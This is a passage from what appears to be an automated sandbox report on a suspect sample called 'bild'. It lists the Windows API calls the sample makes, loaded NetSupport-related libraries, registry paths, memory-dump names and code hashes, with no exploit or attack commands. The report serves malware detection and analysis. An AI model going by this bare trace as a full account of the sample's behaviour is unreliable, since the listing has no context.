• Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
Yara matches
Similarity
• API ID: ErrorLast_memsetgetsocknameinet_ntoa
• String ID:
• API String ID: 3066294524-0
• Opcode ID: dd29d924ea5789e5c8a4c51635ed0a87f0c0d647ba8196720499a5bbafbc1bab
• Instruction ID: e89b7acffd834b5c6dc0d878bfb8d5a1f452ac72541fb4dbe9261f2be5f4a8f5
• Opcode Fuzzy Hash: dd29d924ea5789e5c8a4c51635ed0a87f0c0d647ba8196720499a5bbafbc1bab
• Instruction Fuzzy Hash: 751151B1E00108AFCB04DFA9DC419FFB7B8EB88214F01456ADC15E7240E770AE158B91
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
• __wsplitpath.LIBCMT ref: 11111475
  • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
• GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
• String ID:
• API String ID: 1847508633-0
• Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
• Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
• Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
• Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
APIs
• GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
• OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
  • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
  • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
  • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,00C22EB8,111EEB64,?,00000001,00000001), ref: 1109E990
  • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,00C22EB8,?,00000001,00000001), ref: 1109E9A3
• CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
• String ID:
• API String ID: 2256153495-0
• Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
• Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
• Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
• Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
APIs
• InitializeCriticalSection.KERNEL32(111F0908,A1BC2D8B,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F754
• EnterCriticalSection.KERNEL32(111F0908,A1BC2D8B,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F770
• LeaveCriticalSection.KERNEL32(111F0908,?,?,?,?,-00000001,11182078,000000FF,?,1110F7F8,00000001,?,11169683,?), ref: 1110F7B8
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterInitializeLeave
• String ID:
• API String ID: 3991485460-0
• Opcode ID: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
• Instruction ID: 724175da6b3b5eb63f60f43096b8b9410b0df93e13cce3f4766159a849acac97
• Opcode Fuzzy Hash: de9cc3b242b9749762f72f1a9abe3d064888d8cc99300df6bb387b99347c91a8
• Instruction Fuzzy Hash: 3D11C675A0061AAFE700CF65CD85B5BF7A9FB88714F010129E829E3340F7359808CB92
APIs
• LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: ??CTL32.DLL
• API String ID: 1029625771-2984404022
• Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
• Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
• Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
• Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
APIs
• inet_ntoa.WSOCK32(00000080,?,00000000,?,6C5D8F91,00000000,00000000,6C61B8DA,?,00000080), ref: 6C5D5852
Strings
Memory Dump Source
• Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
• Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
Yara matches
Similarity
• API ID: inet_ntoa
• String ID: gfff
• API String ID: 1879540557-1553575800
• Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
• Instruction ID: 477018614ad807c104869332b51e32acb4aac172d6e7d0a05e9ed5f9057b1eb7
• Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
• Instruction Fuzzy Hash: 611189326083D68BC3068A2EAC602D7BFD9DB86251B2D4569D8C9CB701C611E84AC7D0
APIs
• GetDriveTypeA.KERNEL32(?), ref: 11026B6D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: DriveType
• String ID: ?:\
• API String ID: 338552980-2533537817
• Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
• Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
• Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
• Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                      APIs
                                                                                        • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                      • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                        • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                      Strings
                                                                                      • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CloseOpenwvsprintf
• String ID: Error %d Opening regkey %s
• API String ID: 1772833024-3994271378
APIs
• RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
  • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
Strings
• Error %d closing regkey %x, xrefs: 110ED17D
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Closewvsprintf
• String ID: Error %d closing regkey %x
• API String ID: 843752472-892920262
APIs
• LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,0286B8D0,?,?,?,00000100,?,?,00000009), ref: 111463E9
  • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: HandleLibraryLoadModule
• String ID: NSMTRACE
• API String ID: 4133054770-4175627554
APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,110302C4), ref: 11025CD8
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: psapi.dll
• API String ID: 1029625771-80456845
APIs
• LoadLibraryA.KERNEL32(psapi.dll,?,6C5D8DC8), ref: 6C5D4F78
Strings
Memory Dump Source
• Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: psapi.dll
• API String ID: 1029625771-80456845
APIs
• LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102EF80,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 11014F8E
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: LibraryLoad
• String ID: nslsp.dll
• API String ID: 1029625771-3933918195
APIs
• _memset.LIBCMT ref: 11074E1F
• FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: FreeLibrary_memset
• String ID:
• API String ID: 1654520187-0
APIs
• _memset.LIBCMT ref: 110883EF
• InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CriticalInitializeSection_memset
• String ID:
• API String ID: 453477542-0
                                                                                      • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                      • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                      • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                      • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                      • ExtractIconExA.SHELL32(?,00000000,00050469,00040493,00000001), ref: 11144498
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ExtractFileIconModuleName
                                                                                      • String ID:
                                                                                      • API String ID: 3911389742-0
                                                                                      • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                      • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                      • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                      • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                      APIs
                                                                                        • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                      • __lock_file.LIBCMT ref: 11163DFE
                                                                                        • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                      • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                      • String ID:
                                                                                      • API String ID: 2800547568-0
                                                                                      • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                      • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                      • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                      • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6C26
                                                                                      • Sleep.KERNEL32(00000064), ref: 6C5E6C5B
                                                                                        • Part of subcall function 6C5E6940: GetTickCount.KERNEL32 ref: 6C5E6950
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick$Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 4250438611-0
                                                                                      • Opcode ID: f1395915c1e69caa02b37049a3f34b92a0f1bc81fe28f4ce928e322978903d14
                                                                                      • Instruction ID: 5c06991088173c470f759b7a2080c7f30e7aae5c20f2013a738cd78e48c7af01
                                                                                      • Opcode Fuzzy Hash: f1395915c1e69caa02b37049a3f34b92a0f1bc81fe28f4ce928e322978903d14
                                                                                      • Instruction Fuzzy Hash: C6F03071700308CECF14EA6A9D9635CB6B1DBA639AF120037C616D6E90DF745884C749
                                                                                      APIs
                                                                                      • WSACancelBlockingCall.WSOCK32 ref: 6C5D63A9
                                                                                      • Sleep.KERNEL32(00000032), ref: 6C5D63B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: BlockingCallCancelSleep
                                                                                      • String ID:
                                                                                      • API String ID: 3706969569-0
                                                                                      • Opcode ID: c443bbb7c17a30be6c3a42f858cb2093c76a35b5b8b0053dda7328189b0e033c
                                                                                      • Instruction ID: f274e3945454fef5c1105bf473dafe4b7b9938a92db539b2a6d72b189ff1db9d
                                                                                      • Opcode Fuzzy Hash: c443bbb7c17a30be6c3a42f858cb2093c76a35b5b8b0053dda7328189b0e033c
                                                                                      • Instruction Fuzzy Hash: 2FB092B0392350CDAF01177E4D0629A30D80FC424BF6208606A51CAD8AEF20D506A929
                                                                                      APIs
                                                                                        • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                        • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                      • GetLastError.KERNEL32(?,0286B8D0,000000FF,?), ref: 11144ED5
                                                                                      • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0286B8D0,000000FF,?), ref: 11144EE5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
